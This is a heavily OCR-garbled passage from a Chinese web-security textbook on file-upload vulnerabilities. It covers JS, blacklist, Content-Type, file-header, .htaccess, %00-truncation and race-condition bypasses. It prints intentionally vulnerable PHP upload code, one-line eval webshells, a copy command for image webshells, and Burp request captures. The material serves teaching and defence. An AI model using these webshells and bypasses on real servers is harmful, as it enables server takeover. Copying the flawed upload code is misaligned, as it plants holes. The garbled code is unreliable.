echo ' 文 件 上 传 成 功 , 保 存 于 :' . Suploaddir . $ FILES['upfile']['name'] . 


Dus 
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exit (Suploaddir . ' 文 件 夹 不 存在 ,请 手工 创建 !'); 


} 
p 
< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtmll/DTD/xhtmll-transitional.dtd"» 
<html xmlns-"http://www.w3.0rg/1999/xhtml"» 
<head> 
<meta http-equiv="Content-Type" content="text/html;charset=gbk"/> 
<meta http-equiv="content-language" content="zh-CN"/> 
<title> 前 端 Js 过 滤 绕 过 < /title> 
«script type-"text/javascript"» 
function checkFile() ( 
var file-document.getElementsByName ('upfile')[0].value; 
if (file--null || file--"") ( 
alert ("你 还 没有 选择 任何 文件 ,不 能 上 传 !"); 
return false; 
) 
var allow ext-".jpgl.jpegl.pngl.gif|.bmp|"; 
var ext name-file.substring(file.lastIndexOf(".")); 
if (allow ext.indexOf(ext name *"|") ==-1) ( 
var errMsg- "该 文件 不 允许 上 传 ,请 上 传 " «allow ext +" 类 型 的 文件 , 当 
前 文件 类 型 为 :" +ext_name; 
alert (errMsg); 
return false; 
} 
} 
</script> 
<body> 
<h3> 前 端 Js 过 滤 绕 过 </h3> 
«form action-"" method- "post" enctype-"multipart/form-data" name-"upload" 
onsubmit-"return checkFile()"» 
«input type="hidden" name-"MAX FILE SIZE" value-"204800"/» 
请 选择 要 上 传 的 文件 :<input type-"file" name-"upfile"/» 
«input type="submit" name-"submit" value=" 上 传 "/> 
</form> 
</body> 
</html> 


此 文件 通过 JS 代码 判断 文件 的 类 型 ,并 且 通 过 白 名 单 的 方式 定义 了 可 以 上 传 的 文件 
的 扩展 名 ,扩展 名 如 果 不 是 . jpg、. jpeg、. png.. gif、. bmp 就 不 允许 上 传 。 

JS 代码 的 验证 是 在 前 端 进行 的 ,可 以 用 多 种 方式 绕 过 ,包括 修改 JS 代码、 利用 Burp 
Suite 改 包 等 。 


2. Burp Suite 抓 包 绕 过 JS 代码 验证 
JS 代码 的 验证 是 在 前 端 进行 的 , 先 将 木马 的 扩展 名 改 为 . jpg, 这 样 就 可 以 通过 前 端 
JS 代码 验证 ,然后 通过 抓 包 工具 Burp Suite 将 发 往 服务 器 的 数据 包 拦 截 后 ,将 扩展 名 
.jpg 修改 为 . php, 因 为 后 端 没有 验证 ,这 样 就 可 以 成 功 上 传 扩 展 名 为 . php 的 木马 。 具 体 
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操作 步骤 如 下 。 
CD 将 木马 22. php 的 扩展 名 改 为 .jpg, 上 传 22. jpg, 如 图 3-1 所 示 。 


Load URL [http//www.ctís-wiki.com/fileupload jsphp 
Split URL 


SET] 


请 选择 要 上 传 的 文件 : | DUAL. | 22.jpg f 


图 3-1 上 传 22.jpg 文 件 


(2) 利用 Burp Suite 截 包 后 ,修改 22. jpg 的 扩展 名 为 . php ,然后 将 其 上 传 到 服务 器 ， 
这 样 就 可 以 绕 过 前 端的 JS 代码 验证 ,如 图 3-2 所 示 。 


Accept: text/html, application/xhtmlt*xml, application/xml;q-0.9, */*;q-0.B 
Accept-Language: zh-CN,zh;q-0.8,en-US;q-0.5, en;q-0.3 

Accept-Encoding: gzip, deflate 

Content-Type: multipart/form-data; boundary---------------------------- 156722693218116 
Content-Length: 127615 

Referer: http://www.ctfs-wiki.com/fileupload js.php 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 


----------------------------- 156722693218116 
Content-Disposition: form-data; name-"MAX FILE SIZE" 


204800 

----------------------------- 156722693218116 
Content-Disposition: form-data; name-"upfile"; filename-'[77-phg[] 
Content-Type: image/jpeg 


3-2 ”修改 扩展 名 并 上 传 文件 
(3) 22. php 已 经 成 功 上 传 到 服务 器 uploads 文件 夹 下 ,如 图 3-3 所 示 。 


文件 上 传 成 功 ， 保 存 于 : uploads/22.php 
前 端 JS 绕 过 


请 选择 要 上 传 的 文件 : | 浏览 | 未 选择 文件 . 


图 3-3 22. php 成 功 上 传 


(4) 访问 木马 文件 ,可 以 正常 解析 ,如 图 3-4 所 示 。 


LOGIN 


图 3-4 22. php 正常 解析 
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3. 修改 前 端 JS 验证 代码 上 传 木马 
前 端的 JS 验证 代码 是 可 以 修改 的 。 通 过 JS 编辑 工具 ,对 JS 验证 代码 进行 修改 ,使 


其 允许 上 传 PHP 文 件 。 
CD 利用 JS 编辑 工具 (例如 firebug) 打 开 JS 验证 代码 , 右 击 代码 ,在 快捷 菜单 中 选择 


“编辑 HTML” 命令 ,修改 JS 验证 代码 ,如 图 3-5 所 示 。 


前 端 JS 绕 过 
请 选择 要 上 传 的 文件 : | DSL] 未 选择 文件 . "n 


e W < > >= mu HTML | css Más DOM FE Cookies 
Mj | Ri | body < html 


CIDOCTYPS html PUBLIC “-//F3C//DTD XHTML L O Transitional//RN" "http://ewr. w3. cra/TR/s) 
E html guine http://eve. v3. org/1999/xhtal"> 
B head 
(meta http-equiv-"Content-Iype" content- tert/hta]:charset-gbk^o 
(meta http-equiv- content-language" content- zb-CN^) 
《titley MISHR </title> 
Bi <script type-°text/javaseript” 


2 function checkPile0 { 
3 var file = document. getBLementsByName  upfile' ) [0]. value 
4 if (file — null || file — °”? { 
5| 上 Lert(" 你 还 没有 选择 任何 文件 ， 不 能 上 传 1”) ; 
6l return false: 
了 ) 
8| // 定 义 允 许 上 传 的 文件 类 型 
9 var allow ext = *. jpe]. jpeg|. pna]. aif |. bap|”; 
10| // 提 取 上 传 文件 的 类 型 
“u| var ext same = file. substring (file. lastIndexOf (". ”)) ; 
12| // 判 断 上 传 文件 类 型 是 否 克 许 上 传 
13| if (allow ext. indexOf (ext name + "|" — -D ( 
E var errMss ~“ 该 文件 不 允许 上 传 ， 请 上 传 ”* allow_ext + "RAHLE, 当前 文件 类 型 为 ，”+ ext name: 
15| alert (errisg): 
16| return false; 
Ni ) 
18| ) 
19| 
&/seript? 


bead) 


3-5 利用 firebug 修改 JS 验证 代码 


(2) JS 验证 代码 是 var allow_ext=".jpg|.jpeg|. pngl. gif]. bmp|", 通 过 白 名 单 判 
断 上 传 文件 的 类 型 。 在 类 型 中 添加 . php, 这 样 JS 验证 代码 就 允许 上 传 扩 展 名 为 . php 的 
文件 ,如 图 3-6 所 示 。 
下 


<script type-"te: vascript"? 
function checkFile( { 
var file = document. getElementsBjName ( upfile’ ) [0]. value: 
if (file 一 null || file — ^D ( 
alert 4k45 EB IERHEBIXAF, PEER): 
return false: 
) 


var allow ext = ". jpg|- 3pea|. png |. gif]. bup |. php| ”; 


var ext name ~ file. substring (file. lastIndexOF(. ): 
if (allow ext. indexof (ext name + "| 一 -0) { 
var errMsg ~“ 访 文件 不 允许 上 传 ， 请 上 传 ”+ allow_ext +“ 关 型 的 文件 , 当前 文件 类 型 为 : ”+ ext name; 
alert (errMsa) ; 
xeturn false: 
) 
) 


</script>? 


图 3-6 在 JS 验证 代码 中 添加 扩展 名 . php 
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(3) 修改 完 JS 验证 代码 后 ,直接 上 传 木马 文件 ,发 现 木马 文件 成 功 上 传 , 如 图 3-7 
所 示 。 


文件 上 传 成 功 ， 保 存 于 : uploads/ma.php 
前 端 JS 绕 过 
请 选择 要 上 传 的 文件 : | 浏览 | 未 选择 文件 . 上 传 


图 3-7 木马 成 功 上 传 


3.3 文件 名 过 滤 绕 过 


文件 名 过 滤 绕 过 的 原理 是 : JS 验证 代码 通过 黑 名 单 的 方式 判断 文件 上 传 的 类 型 ,而 
且 并 没有 完整 的 文件 过 滤 功能 ,攻击 者 通过 上 传 黑 名 单 之 外 的 文件 类 型 绕 过 文件 上 传 
验证 。 

1. 文件 名 过 滤 绕 过 示例 代码 分 析 

文件 名 过 滤 绕 过 示例 代码 如 下 : 


«form action-"" enctype-"multipart/form-data" method-"post" 
name="uploadfile"> 上 传 文件 :<input type-"file" name-"upfile"/»«br» 
«input type="submit" value= "上传 "/></form> 
«?php 
if(is uploaded file($ FILES['upfile']['tmp name']))( 

S$upfile-$ FILES["upfile"]; 


// 获 取 数 组 中 的 值 

$name=$upfile["name"]; // 上 传 文件 的 文件 名 
$type-substr($name, strrpos ($name, '.')41); // 上 传 文件 的 类 型 
$size-$upfile["size"]; // 上 传 文件 的 大 小 

$tmp name-$upfile["tmp name"]; // 上 传 文件 的 临时 存放 路 径 
// 判 断 是 否 为 图 片 


if($type--"php")( 
echo "<script>alert(' 不 能 上 传 php X f£! ') «/script»"; 
die(); 

Jelse( 


Serror-$upfile["error"]; // 上 传 后 系统 返回 的 值 


echo "上 传 信息 :«br/»"; 
if (Serror==0) { 
echo "文件 上 传 成 功 啦 i"; 
echo "<br> 图 片 预览 :<br>"; 
echo "<img src=" .$destination. ">"; 
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//echo "alt=\" 图 片 预览 : Ne 文件 名 :" .$destination."\r 上传 时 间 :\">"; 


} 
?2» 


在 上 面 的 代码 中 ,if($ type 二 二 "php") 判 断 文 件 的 类 型 是 否 为 php, 如 果 是 php, M 
不 允许 上 传 。 这 种 黑 名 单 的 判断 方式 很 容易 绕 过 ,并 且 此 处 并 没有 判断 各 种 大 小 写 的 情 
况 ,可 以 用 PhP、phP、php3、phtml 等 多 种 扩展 名 绕 过 文件 名 过 滤 。 


2. 文件 名 过 滤 绕 过 过 程 


文件 名 过 滤 绕 过 的 过 程 如 下 : 
CD 将 木马 文件 test. php 的 扩展 名 改 为 phpP, 进 行 上 传 ,如 图 3-8 所 示 。 


上 传 文件 : [ BBS. | testphe 


[te 


图 3-8 上 传 test.phP 


(2) test. phP 上 传 成 功 , 如 图 3-9 所 示 。 


上 传 放 件 名 称 是 : testphP 

上 传 文件 类 型 是 : phP 

上 传 文件 大 小 是 : 77291 

上 传 后 系统 返回 的 值 是 : 0 

上 传 文件 的 临时 存放 路 径 是 : CADocuments and Settings\a\Local Settings\Temp\php10.tmp 
开始 移动 上 传 文件 


上 
文件 上 传 成 功 听 1 
EHI: 

BJ 


3-9 test. phP 上 传 成 功 


(3) test. phP 可 以 正常 解析 ,如 图 3-10 所 示 o 


Password:[ | 


3-10 test. phP 可 以 正常 解析 


3.4 Content-Type 过 滤 绕 过 — 


Content-Type 用 于 定义 网 络 文件 的 类 型 和 网 页 的 编码 ,用 来 告诉 文件 接收 方 将 以 什 
么 形式 、 什 么 编码 读 取 这 个 文件 。 
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不 同 的 文件 都 会 对 应 不 同 的 Content-Type。 例 如 ,JPG 文件 的 Content-Type 为 
image/jpeg. PHP 文件 的 Content-Type JJ application/octet-stream, Content-Type 在 数 
据 包 的 请 求 包头 中 ,开发 者 会 通过 Content-Type 判断 文件 是 否 允许 上 传 ,但 是 Content- 
Type 可 以 通过 抓 包 自 改 ,这 样 就 可 以 绕 过 Content-Type 过 滤 。 


1. Content-Type 过 滤 绕 过 示例 代码 分 析 
Content-Type 过 滤 绕 过 示例 代码 如 下 : 


<form action-"" enctype-"multipart/form- data" method="post" 

name= "uploadfile"> 上 传 文件 :<input type-"file" name-"upfile"/»«br» 
«input type="submit" value=" 上 传 "/></form> 

<?php 


if(is uploaded file($ FILES['upfile']['tmp name']))( 
$upfile-$ FILES["upfile"]; 


// 获 取 数 组 中 的 值 

$name- $upfile ["name"]; // 上 传 文件 的 文件 名 
$type-$upfile["type"]; // 上 传 文件 的 类 型 
$size-$upfile["size"]; // 上 传 文件 的 大 小 

$tmp name-$upfile["tmp name"]; // 上 传 文件 的 临时 存放 路 径 
// 判 断 是 否 为 图 片 


switch ($type){ 
case 'image/pjpeg':$okType-true; 
break; 
case 'image/jpeg':$okType-true; 
break; 
case 'image/gif':S$okType-true; 
break; 
case 'image/png':S$okType-true; 
break; 
) 
if ($okType) { 
$error=$upfile["error"]; // 上 传 后 系统 返回 的 值 
echo "============ ===<br/>"; 
echo "上 传 文件 名 称 是 :". $name ."<br/>"; 
echo "上 传 文件 类 型 是 :" .$type."<br/>"; 
echo "上 传 文件 大 小 是 :". $size."<br/>"; 
echo "上 传 后 系统 返回 的 值 是 :". $error."<br/>"; 
echo "上 传 文件 的 临时 存放 路 径 是 :".$tmp_name."<br/>"; 
echo "开始 移动 上 传 文件 <br/>"; 
move uploaded file($tmp name,'up/'.$name); 
$destination-"up/".$name; 


echo "上 传 信息 :«br/»"; 
if(Serror--0)( 
echo "文件 上 传 成 功 啦 !1"; 
echo "<br> 图 片 预览 :<br>"; 
echo "<img src-".$destination."»"; 


//echo "alt=\" 图 片 预览 : Nc XHK :".Sdestination."Nr 上 传 时 间 :\">"; 
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Jelseif (Serror--1)1 
echo "超过 了 文件 大 小 ,在 Php.ini 文 件 中 设置 "; 
Jelseif (Serror--2)( 
echo "超过 了 文件 的 大 小 MAX FILE SIZE 选项 指定 的 值 "; 
Jelseif (Serror--3)( 
echo "文件 只 有 部 分 被 上 传 "; 
Jelseif ($error==4){ 
echo "没有 文件 被 上 传 "; 
Jelset 
echo "上 传 文件 大 小 为 0"; 
) 
}else{ 
echo "请 上 传 jpg gif png 等 格式 的 图 片 !"; 


} 


? > 


此 代码 获取 了 上 传 文件 的 Content-Type, 并 且 利用 白 名单 判 断 Content-Type 必须 是 
image/pjpeg. image/jpeg. image/gif image/png 之 一 , 才 人 允许 上 传 文件 。 但 是 , PHP 文件 
的 Content-Type 是 application/octet-stream。 利 用 抓 包 工具 将 数据 包 的 Content-Type 
改 为 image/pjpeg, image/jpeg, image/gif, image/png 之 一 , 即 可 绕 过 Content-Type 
过 滤 。 


2. 修改 Content-Type 绕 过 过 滤 的 过 程 

修改 Content-Type 绕 过 过 滤 的 过 程 如 下 : 

(1) 如 果 上 传 PHP 木马 , 则 PHP 文件 的 Content-Type J& application/octet-stream, 
不 在 白 名 单 中 ,无 法 上 传 ,如 图 3-11 所 示 。 


POST /cms/fileupload/fileupload type.php HTTP/1.1 

Host: www.ctfs-wiki.com 

Proxy-Connection: keep-alive 

Content-Length: 226 

Cache-Control: max-age=0 

Upgrade-Insecure-Requests: 1 

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIKGOpgPHCBkZr1QM 
lUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/65.0.3325.181 Safari/537.36 

lAccept-Encoding: gzip, deflate 

laccept-Language: zh-CN,zh;q-0.9 


wa WebKitFormBoundaryIKGOpgPHcBkZrlQM 
|lContent-Disposition: form-data; name-"upfile"; filename-"ma.php" 
Content-Type: application/octet-stream 


<?php &eval($ REQUEST[123]);?» 
—— WebKitFormBoundaryIKGOpgPHcBkZrlQM-- 


图 3-11 PHP 文 件 的 Content-Type JJ application/octet-stream 


(2) 通过 Burp Suite 抓 包 ,将 数据 包 的 Content-Type 改 为 image/pjpeg, image/jpeg. 
image/gif image/png 之 一 ,就 会 绕 过 过 滤 , 将 木马 文件 上 传 到 服务 器 上 面 ,如 图 3-12 所 示 。 
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[Upgrade-Insecure-Requests: 1 
Content-Type: multipar/form-data; boundary-— 4 50657 19023822 
Content-Length: 230 


|Content-Disposition: form-data; namez"upfile"; flename-"ma php" 
Content-Type: image/jpeg 


<? 


IUEST[123];?» 
50657 19023822-- 


3-12. 修改 Content-Type 绕 过 过 滤 


3.5 文件 头 过 滤 绕 过 


各 种 文件 都 有 特定 的 文件 头 格式 ,开发 者 通过 检查 上 传 文件 的 文件 头 检测 文件 类 型 。 
但 是 这 种 检测 方式 同样 可 以 被 绕 过 ,只 要 在 木马 文件 的 头 部 添加 对 应 的 文件 头 , 这 样 既 可 
以 绕 过 检测 ,又 不 影响 木马 文件 的 正常 运行 。 

常见 的 文件 头 如 下 : 

° JPEG: 0xFFD8FF, 

e PNG: 0x89504E470D0A1A0A. 

e GIF; 47 49 46 38 39 61 (GIF89a) 。 

文件 头 过 滤 绕 过 示例 代码 如 下 : 


«form action-"" enctype-"multipart/form-data" method-"post" 
name-"uploadfile"» Ef Xf :«input type-"file" name-"upfile"/»«br» 
«input type="submit" value-"[/[£"/»«/form» 

«?php 

if(is uploaded file($ FILES['upfile']['tmp name']))( 

$upfile-$ FILES["upfile"]; 


// 获 取 数组 中 的 值 

$name=$upfile["name"]; // 上 传 文件 的 文件 名 
$type-substr($name, strrpos ($name, '.')+1); // 上 传 文件 的 类 型 
$size=$upfile["size"]; // 上 传 文件 的 大 小 

$tmp name-$upfile["tmp name"]; // 上 传 文件 的 临时 存放 路 径 
// 判 断 是 否 为 图 片 


if(!exif imagetype($ FILES['upfile']['tmp name']))( 
echo "«script»alert( ifi LERH Xf!) </script>"; 
die(); 

Jelse( 


$error=$upfile["error"]; // 上 传 后 系统 返回 的 值 


echo "上 传 文件 名 称 是 :".Sname."<br/>"7 
echo "上 传 文件 类 型 是 :" .$type."<br/>"; 
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echo "上 传 文件 大 小 是 :".$size."<br/>"; 
echo "上 传 后 系统 返回 的 值 是 :" .$error."<br/>"; 
echo "上 传 文件 的 临时 存放 路 径 是 :". $tmp name."<br/>"; 
echo "开始 移动 上 传 文件 <br/>"; 
// 把 上 传 的 临时 文件 移动 到 up 目录 下 面 
move uploaded file($tmp name, 'up/'.$name); 
$destination- "up/".$name; 
echo "---- ==<br/>"; 
echo "上 传 信息 :<br/> "7 i 
if(Serror--0)( 
echo "X fF E fen 1; 
echo "<br> Él H BUS :«br»"; 
echo "<img src-".$destination."»"; 


//echo "alt=\" 图 片 预览 :\r 文 件 名 :".S$destination."\r 上 传 时 间 :\">"; 


) 


?» 


在 上 面 的 代码 中 通过 exif. imagetype 函数 判断 上 传 的 文件 是 否 是 图 片 。exif_ 
imagetype 读 取 一 个 图 像 的 第 一 个 字 节 并 检查 其 签名 。 如 果 发 现 了 恰当 的 签名 , 则 返回 
一 个 对 应 的 常量 ;否则 返回 FALSE。 可 以 通过 图 片 木 马 绕 过 exif_imagetype 函数 的 
检测 。 

CD 在 木马 文件 中 添加 图 片 文 件 的 文件 头 , 即 可 绕 过 检测 ,如 图 3-13 所 示 。 木 马 的 
内 容 为 GIF89a<?php (2eval( $ _REQUEST[123]); ?>, 


上 传 文件 : | 选择 文件 | 未 选择 任何 文件 
+ 


上 传 文件 名 称 是 : test.php 

上 传 文件 类 型 是 : php 

上 传 文件 大 小 是 : 36 

上 传 后 系统 返回 的 值 是 : 0 

上 传 文件 的 临时 存放 路 径 是 : C\Documents and Settings\Administrator\Local Settings\Temp\php14.tmp 
开始 移动 上 传 文件 


上 传 信息 : 
文件 上 传 成 功 啦 ! 
图 片 预览 : 

z 


3-3 在 木马 文件 中 添加 图 片 文件 的 文件 头 绕 过 检测 


(2) 通过 copy 命令 进行 图 片 木 马 制作 
111.jpg 是 正常 的 图 片 文件 。a. txt 是 木马 的 代码 ,其 内 容 为 <?php @eval($_POST 
[170 ;?2», HAAF copy 命令 将 两 个 文件 合成 到 test. php 木马 文件 中 : 


copy 111.jpg /b +a.txt /a test.php 


将 制作 好 的 图 片 木马 test. php 上 传 ,成 功 绕 过 过 滤 , 上 传 到 服务 器 中 ,如 图 3-14 
所 示 。 
137 


Web 安全 原理 分 析 与 实践 


上 传 信息 : 
文件 上 传 成 功 啦 ! 
图 片 预览: 


图 3-14 图 片 木马 绕 过 过 滤 上 传 到 服务 器 中 


(3) 用 “菜刀 ”工具 访问 ,发 现 上 传 的 木马 可 以 正常 连接 ,如 图 3-15 所 示 。 


EE [Af testphp 
E È phpStudy 
日 回 ww 
BC ms 
E È fileupload 


o 
(à spache-toncat-7.0.57 
(Cà bea 
(Cà Config. Msi 


C Documents and Settings 
(Cà FPSE search 
(C Inetpub 


图 3-15 “菜刀 ”工具 正常 连接 上 传 的 木马 


3.6 . htaccess 文件 上 传 


. htaccess 文件 上 传 是 利用 . htaccess 文件 可 以 对 Web 服务 器 进行 配置 的 功能 ,实现 
将 扩展 名 为 . jpg、. png 等 的 文件 当 作 PHP 文件 解析 的 过 程 。 


3.6.1 .htaccess 基础 


. htaccess 文件 (分 布 式 配置 文件 ) 提供 了 一 种 基于 每 个 目录 进行 配置 更 改 的 方法 。 
它 是 包含 一 个 或 多 个 配置 指令 的 文件 , 放 在 特定 的 文档 目录 中 ,文件 中 的 指令 适用 于 该 目 
录 及 其 所 有 子 目录 。 

. htaccess 是 Web 服务 器 的 一 个 配置 文件 ,可 以 通过 . htaccess 文件 实现 Web 服务 器 
中 的 文件 的 解析 方式 、 重 定向 等 配置 。 


1. 开启 .htaccess 的 配置 
开启 . htaccess 文件 需要 修改 如 下 配置 ,并 重启 Web 服务 器 才能 生效 。 
1) 修改 配置 文件 httpd. conf 


Options FollowSymLinks AllowOverride None 
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2) 去 掉 mod_rewrite. so 的 注释 ,开启 rewrite 模块 


2. .htaccess 文件 上 传 配 置 
在 . htaccess 中 可 以 用 以 下 两 种 方法 将 其 他 扩展 名 的 文件 当 作 代 码 来 解析 。 
(1) 指定 文件 名 。 例 如 : 


(2) 指定 文件 后 级 。 例 如 : 


3.6.2 „htaccess 文件 上 传 示例 代码 分 析 
. htaccess 文件 上 传 示例 代码 如 下 : 
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echo "上 传 文件 的 临时 存放 路 径 是 :".$tmp_name."<br/>"; 


echo "开始 移动 上 传 文件 <br/>"; 
// 把 上 传 的 临时 文件 移动 到 up 目录 下 面 
move uploaded file($tmp name,'up/'.$name); 
$destination-"up/".$name; 
echo "================<br/>"; 
echo " Ef£f B :«br/»"; 
if(S$error--0)( 
echo "文件 上 传 成 功 啦 !1"; 
echo "<br> 图 片 预览 EA t 
echo "<img src=".$destination. ">"; 


//echo " alt=\" 图 片 预 览 : Nc 文件 名 :".sSdestination."\r 上传 时 间 :\"> n; 


) 


上 面 这 段 代 码 通过 if Cpreg match C/php.. * /i"，$type)) 判 断 文件 的 扩展 名 是 否 
. php.. php3,. php5 等 ,并 且 判 断 不 同 大 小 写 的 情况 ,这 样 就 无 法 通过 修改 扩展 名 来 绕 过 
上 传 过 滤 。 但 是 可 以 通过 上 传 . htaccess 文件 ,然后 再 上 传 图 片 木 马 来 绕 过 上 传 过 滤 。 

漏洞 利用 过 程 如 下 : 

(1) 构造 . htaccess 文件 。 htaccess 文件 的 内 容 是 AddType application/x-httpd- 
php. jpg. 

(2) 构造 图 片 木马 文件 。xx. jpg 是 正常 的 图 片 文件 , ma. txt 文件 的 内 容 是 二 ?php 
@eval( $ __POST['1']); ?> ,利用 命令 copy xx. jpg /b + ma. txt tpm. jpg 获得 图 片 木 马 
tpm. jpg. 

(3) 通过 文件 上 传 功 能 上 传 . htaccess 和 tpm. jpg 文件 ,如 图 3-16 和 图 3-17 所 示 o 


文件 上 传 .htaccess 上 传 


请 上 和 传 PHP 文 件 


请 上 传 文件 -| QUAL. | 未 选择 文件 


上 传 文件 名 称 是 : htaccess 
上 传 文件 类 型 是 : htaccess 
上 传 文件 大 小 是 : 37 


图 3-16 上传 . htaccess 文件 


(4) 两 个 文件 上 传 成 功 后 访问 图 片 木马 ,发 现 里 面 的 PHP 代码 已 经 成 功 解析 , 如 
图 3-18 所 示 。 
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文件 上 传 .htaccess 上 传 


请 上 传 PHP 文 件 


请 上 传 文件 | IR. | gx 件 . 
submit 


上 传 文件 大 小 是 : 36237 

上 传 后 系统 返回 的 值 是 : 0 

上 传 文件 的 临时 存放 路 径 是 : AmpiphpknRRRQ 
开始 移动 上 传 文件 


文件 上 传 成 功 啦 ! 
图 片 预览 


图 3-17 上 传 tpm.jpg 文 件 


WE) LoadURL |http;//192.168.91.142/upload/up/tpmjpg 
A Split URL 


3) Execute 


E Enable Post data [] Enable Referrer 
Post data 1=phpinfo0; 


VY vov TIVEV X AYVVIUYUDVIY Y UYTYUuVIV Y Y TN X v VT 


.9De9N6/6e60edeeseeee[]ePeee(teaQ'eea4Q)Ee 9rv9999*69 


system Linux f507700b1e7d 4.4.0-135-generic $161-Ubuntu SMP Mon Aug 27 10:45:01 UTC 
[2018 x86 64. 


E338 图 片 木马 中 的 PHP 代码 成 功 解析 


37; 文件 截断 上 传 


产生 文件 截断 上 传 漏洞 的 主要 原因 就 是 存在 %00 这 个 字符 , 当 PHP 的 版 本 低 于 
5.3.4 时 ,会 把 它 当 作 结 束 符 , 导 致 后 面 的 数据 直接 被 忽略 ,造成 文件 上 传 被 截断 。 上 传 
时 ,如 果 上 传 文件 的 路 径 可 控 , 可 以 通过 %00 截断 进行 木马 上 传 。 
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1. 文件 截断 上 传 示例 代码 分 析 
文件 截断 上 传 示例 代码 如 下 : 


«?php 

if(is uploaded file($ FILES['upfile']['tmp name']))( 
$upfile-$ FILES["upfile"]; 
$name-$upfile["name"]; 
$type=substr ($name, strrpos ($name, '.')*1); 
$size=$upfile["size"]; 
$tmp_name=$upfile["tmp_name"]; 


$uptypes=array ('jpg', 'jpeg', 'png','pjpeg', 'gif', 'bmp'); 


$path-'up/'.$ POST[path].rand().'jpg'; 
if(!in array($type, $uptypes))[ 


echo "< font color-'red'» RfE E f£ FS f 3c fF !« /£ont» "; 


exit; 
Jelset 
Serror-$upfile["error"]; 
move uploaded file(S$tmp name, $path); 
$destination-$path; 
echo "上 传 信息 :<br/>"; 
if(Serror--0)( 
echo "文件 上 传 成 功 啦 !<br/> "7 
echo " 文件 路 径 :".$destination; 


上 面 的 代码 中 存在 文件 截断 上 传 漏洞 。 代 码 中 文件 上 传 的 路 径 由 下 面 的 代码 定义 ， 
$ path—'up/'. $ POST[path]. rand(). jpg',path 的 路 径 是 可 控 的 ,因此 可 以 通过 path 
进行 %00 截断 上 传 。 


2. 文件 截断 上 传 漏洞 利用 过 程 
文件 截断 上 传 漏洞 利用 过 程 如 下 : 
COD 上 传 木 马 文件 ma. php ,用 户 名 前 缀 设置 为 test, 如 图 3-19 


所 示 o 


文件 截断 上 传 


请 上 和 传 PHP 文 件 


上 传 文件 用 户 名 前 缀 : lest 
上 传 文件 : | 浏览 .| ma php 
I 


© CTFS-WIKI 


图 3-19 ”上传 木马 文件 ma. php, 用 户 名 前 缀 为 test 
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(2) 通过 Burp Suite 抓 包 ,将 test 改 为 test. php%00aaa, 将 ma. php 改 为 ma. jpg, X 
样 就 可 以 通过 验证 函数 的 过 滤 ,如 图 3-20 所 示 。 


Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


[oae e === 107002896518128 
IContent-Disposition: form-data; name-"path" 


test. php%0Oaaa 


107002896518128 
IContent-Disposition: form-data; name-"upfile"; filename-"ma. jpg" 
IContent-Type: application/octet-stream 


<?php @eval ($_POST [123]) ; ?》 


-107002896518128-- 


3-20 将 test KH test. php?600aaa 


(3) 对 test. php% 00aaa 中 的 %00 进行 URL 编码 。 选 中 % 00, 选择 Convert 
selection>URL—URL-decode 命令 进行 编码 ,如 图 3-21 所 示 。 对 %00 进行 URL 编码 
后 的 效果 如 图 3-22 所 示 。 


Do an active scan 
est. phi Send to Intruder 
Doc Send to Repeater 
lontent] Send to Sequencer 
Send to Comparer 
?php (d Send to Decoder 
------ aaah DORI 18128-- 
Engagement tools > 
Change request method 
Change body encoding 

Copy URL 

Copy as curl command 
Copy to file 

Paste from file 

Save item 

Dont intercept requests » 
Do intercept. 


128 
file"; filename-"ma. jpg" 


LE 


M 


3-21 对 %00 进行 URL 编码 


lUpgrade-Insecure-Requests: 1 


107002896518128 
ontent-Disposition: form-data; name-"path" 


107002896518128 
ontent-Disposition: form-data; name-"upfile"; filename-"ma. jpg" 
ontent-Type: application/octet-stream 


«php Geval($ POST[123]);? 
———— 107002896518128-- 


3-22 对 %00 进行 URL 编码 后 的 效果 
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(4) 发 送 数据 包 ,发 现 已 经 成 功 截断 文件 上 传 ,test. php 上 传 成 功 ,并 且 可 以 正常 解 


析 , 如 图 3-23 所 示 。 


http://192.168.91.142/upload/up/test.php 


EJ Enable Post data 口 Enable Referrer 


123=phpinfo0; 


3-23 test. php 上 传 成 功 并 且 可 以 正常 解析 


3.8 竞争 条 件 文件 上 传 


竞争 条 件 是 指 多 个 线程 在 没有 进行 锁 操作 或 者 同步 操作 的 情况 下 同时 访问 同一 个 共 


享 代码 ,变量 ,文件 等 ,运行 的 结果 依赖 于 不 同 线程 访问 数据 的 顺序 。 


脏 牛 漏洞 就 是 利用 Linux 内 核 的 竞争 条 件 进行 的 攻击 。 竞 争 条 件 同 样 在 Web 应 用 


中 也 存在 大 量 的 漏洞 场景 ,例如 ,利用 竞争 条 件 进行 木马 文件 上 传 。 
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1. 竞争 条 件 文件 上 传 示例 代码 分 析 
竞争 条 件 文件 上 传 示例 代码 如 下 : 


S$allow ext-array ("gif","png","jpg"); 
$filename-$ FILES['upfile']['name']; 
move uploaded file($ FILES['upfile']['tmp name'],"./up/".$filename); 
$file-"./up/".$filename; 
echo "文件 上 传 成 功 : ". $file."\n<br /»"; 
Sext-array pop(explode(".",$ FILES['upfile']['name'])) ; 
if (!in array ($ext, $allow ext))( 
unlink ($file); 
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die ("此 文件 类 型 不 允许 上 传 ,已 删除 ") ; 
} 


上 面 的 代码 是 比较 典型 的 存在 竞争 条 件 上 传 漏洞 的 代码 ,本 段 代 码 首先 将 用 户 上 传 
的 文件 保存 在 up 目录 下 ,然后 判断 上 传 文件 的 扩展 名 是 否 在 allow_ext 中 ,如 果 不 在 其 
中 , 则 通过 unlink 函数 删除 已 经 上 传 的 文件 。 漏 洞 点 在 于 文件 在 保存 到 服务 器 之 前 并 没 
有 进行 合法 性 的 检查 ,虽然 保存 后 进行 了 文件 的 检查 ,但 是 利用 竞争 条 件 上 传 漏洞 上 传 有 
写 文件 功能 的 木马 ,在 删除 木马 之 前 访问 已 经 上 传 的 木马 ,可 以 写 人 新 的 木马 。 

漏洞 利用 就 是 不 断 发 送 内 容 如 下 的 木马 文件 上 传 请 求 : 


<? php fputs(fopen("shell.php", "w"), "<?php Geval($ POST[123]);?»"); ?> 


这 样 的 访问 会 生成 新 的 木马 文件 ,然后 再 发 送 另 一 个 请 求 不 断 访问 此 文件 。 如 果 竞 争 条 
